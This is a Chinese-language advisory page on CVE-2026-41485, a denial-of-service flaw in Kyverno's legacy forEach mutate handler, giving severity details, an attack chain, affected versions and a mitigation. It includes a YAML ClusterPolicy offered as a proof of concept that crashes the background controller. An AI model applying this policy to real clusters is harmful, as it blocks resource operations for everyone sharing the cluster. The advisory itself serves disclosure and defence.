CVE-2026-41485 CVSS 7.7 高危

CVE-2026-41485 Kyverno策略引擎拒绝服务漏洞

披露日期: 2026-04-24

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41485

漏洞类型

拒绝服务

CVSS评分

7.7 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Kyverno

漏洞概述

Kyverno是一款云原生策略引擎。在1.17.2和1.16.4版本之前，其传统引擎中的forEach变异处理程序存在未经检查的类型断言漏洞。拥有创建Policy或ClusterPolicy权限的攻击者可利用该缺陷，导致集群范围的背景控制器陷入持续的CrashLoopBackOff状态。此外，该漏洞还会导致准入控制器丢弃连接，阻塞所有匹配资源的操作，从而造成严重的拒绝服务。

技术细节

该漏洞位于Kyverno传统引擎的forEach变异处理程序中，根本原因是代码中存在未经检查的类型断言。当处理特定类型的策略时，程序未验证对象类型即进行断言，导致运行时panic。攻击者只需具备创建策略的低权限，即可构造特制的ClusterPolicy触发该逻辑。一旦触发，后台控制器崩溃并重启循环，导致离线验证失效。同时，准入控制器受影响导致连接丢弃，阻断资源创建或更新请求，直到恶意策略被删除。基于CEL的策略不受影响。

攻击链分析

STEP 1

步骤1

攻击者获取Kyverno集群中创建Policy或ClusterPolicy的低权限。

STEP 2

步骤2

攻击者构造包含特定forEach逻辑的恶意ClusterPolicy资源，并提交到集群。

STEP 3

步骤3

Kyverno后台控制器尝试解析并应用该策略，触发未经检查的类型断言。

STEP 4

步骤4

控制器进程发生panic并崩溃，进入CrashLoopBackOff状态，导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: cve-2026-41485-poc
spec:
  background: true
  rules:
  - name: crash-controller
    match:
      resources:
        kinds:
        - ConfigMap
    mutate:
      foreach:
      - list: "request.object.data"
        # Context causing unhandled type assertion in legacy engine
        context:
        - name: elementData
          variable: "{{ element }}"
        patchStrategicMerge:
          metadata:
            labels:
              poc: "triggered"

影响范围

Kyverno < 1.16.4

Kyverno >= 1.17.0, < 1.17.2

防御指南

临时缓解措施

立即检查并删除导致控制器崩溃的恶意Policy或ClusterPolicy资源，以恢复服务正常运行。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表